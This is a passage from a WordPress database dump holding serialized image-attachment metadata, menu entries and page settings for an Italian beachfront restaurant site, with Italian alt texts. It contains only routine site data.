5s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1428241719\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(450,143,'_wp_attached_file','2015/08/IMG_1045.jpg'),(451,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:1200;s:4:\"file\";s:20:\"2015/08/IMG_1045.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1045-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1045-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_1045-600x800.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1045-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1045-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1045-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1045-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:20:\"IMG_1045-900x576.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:20:\"IMG_1045-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1428241947\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(452,144,'_wp_attached_file','2015/08/IMG_1120.jpg'),(453,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:675;s:4:\"file\";s:20:\"2015/08/IMG_1120.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1120-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1120-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_1120-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1120-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1120-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1120-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:20:\"IMG_1120-900x576.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:20:\"IMG_1120-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1429454666\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(454,145,'_wp_attached_file','2015/08/IMG_1146.jpg'),(455,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:20:\"2015/08/IMG_1146.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1146-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1146-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_1146-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1146-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1146-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1146-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:20:\"IMG_1146-900x576.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:20:\"IMG_1146-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1429714372\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(456,146,'_wp_attached_file','2015/08/IMG_1643.jpg'),(457,146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:1200;s:4:\"file\";s:20:\"2015/08/IMG_1643.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1643-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1643-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_1643-600x800.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1643-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1643-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1643-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1643-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:20:\"IMG_1643-900x576.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:20:\"IMG_1643-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1436104993\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:18:\"0.0015600624024961\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(458,147,'_wp_attached_file','2015/08/IMG_1830.jpg'),(459,147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:1200;s:4:\"file\";s:20:\"2015/08/IMG_1830.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1830-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1830-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_1830-600x800.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1830-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1830-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1830-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1830-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:20:\"IMG_1830-900x576.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:20:\"IMG_1830-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1437831721\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(460,141,'_wp_page_template','default'),(461,141,'slide_template','default'),(462,149,'_menu_item_type','post_type'),(463,149,'_menu_item_menu_item_parent','0'),(464,149,'_menu_item_object_id','141'),(465,149,'_menu_item_object','page'),(466,149,'_menu_item_target',''),(467,149,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(468,149,'_menu_item_xfn',''),(469,149,'_menu_item_url',''),(471,158,'_edit_lock','1451477470:1'),(472,158,'_edit_last','1'),(473,159,'_wp_attached_file','2015/11/solymar-capodanno.jpg'),(474,159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:441;s:4:\"file\";s:29:\"2015/11/solymar-capodanno.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"solymar-capodanno-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-600x331.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:331;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:29:\"solymar-capodanno-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(475,159,'_wp_attachment_image_alt','sol y mare feste natale'),(478,158,'slide_template','default'),(479,158,'_thumbnail_id','159'),(494,28,'slide_template','default'),(495,172,'_edit_lock','1486112947:1'),(496,172,'_edit_last','1'),(497,172,'_wp_page_template','default'),(498,172,'slide_template','default'),(499,36,'slide_template','default'),(500,176,'_menu_item_type','post_type'),(501,176,'_menu_item_menu_item_parent','0'),(502,176,'_menu_item_object_id','172'),(503,176,'_menu_item_object','page'),(504,176,'_menu_item_target',''),(505,176,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(506,176,'_menu_item_xfn',''),(507,176,'_menu_item_url',''),(511,181,'_edit_lock','1458222548:1'),(512,181,'_edit_last','1'),(513,182,'_wp_attached_file','2016/02/happyvalentines.jpg'),(514,182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2016/02/happyvalentines.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"happyvalentines-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"happyvalentines-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"happyvalentines-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"happyvalentines-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"happyvalentines-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"happyvalentines-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"happyvalentines-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:27:\"happyvalentines-960x576.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:27:\"happyvalentines-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(517,181,'slide_template','default'),(524,187,'_edit_lock','1457333539:1'),(525,187,'_edit_last','1'),(526,187,'slide_template','default'),(533,194,'_wp_attached_file','2016/04/IMG_1441-1920x1275.jpg'),(534,194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1275;s:4:\"file\";s:30:\"2016/04/IMG_1441-1920x1275.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"IMG_1441-1920x1275-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-830x551.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x1275-350x232.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(535,194,'_wp_attachment_image_alt','ristorante sulla spiaggia'),(536,195,'_wp_attached_file','2016/04/IMG_1922-1920x1275.jpg'),(537,195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1275;s:4:\"file\";s:30:\"2016/04/IMG_1922-1920x1275.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"IMG_1922-1920x1275-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-830x551.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1922-1920x1275-350x232.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(538,195,'_wp_attachment_image_alt','veranda sulla spiaggia di Riccione'),(539,196,'_wp_attached_file','2016/04/IMG_1608-1920x1275.jpg'),(540,196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1275;s:4:\"file\";s:30:\"2016/04/IMG_1608-1920x1275.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"IMG_1608-1920x1275-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-830x551.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:30:\"IMG_1608-1920x1275-350x232.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(541,196,'_wp_attachment_image_alt','cena al tramonto, in 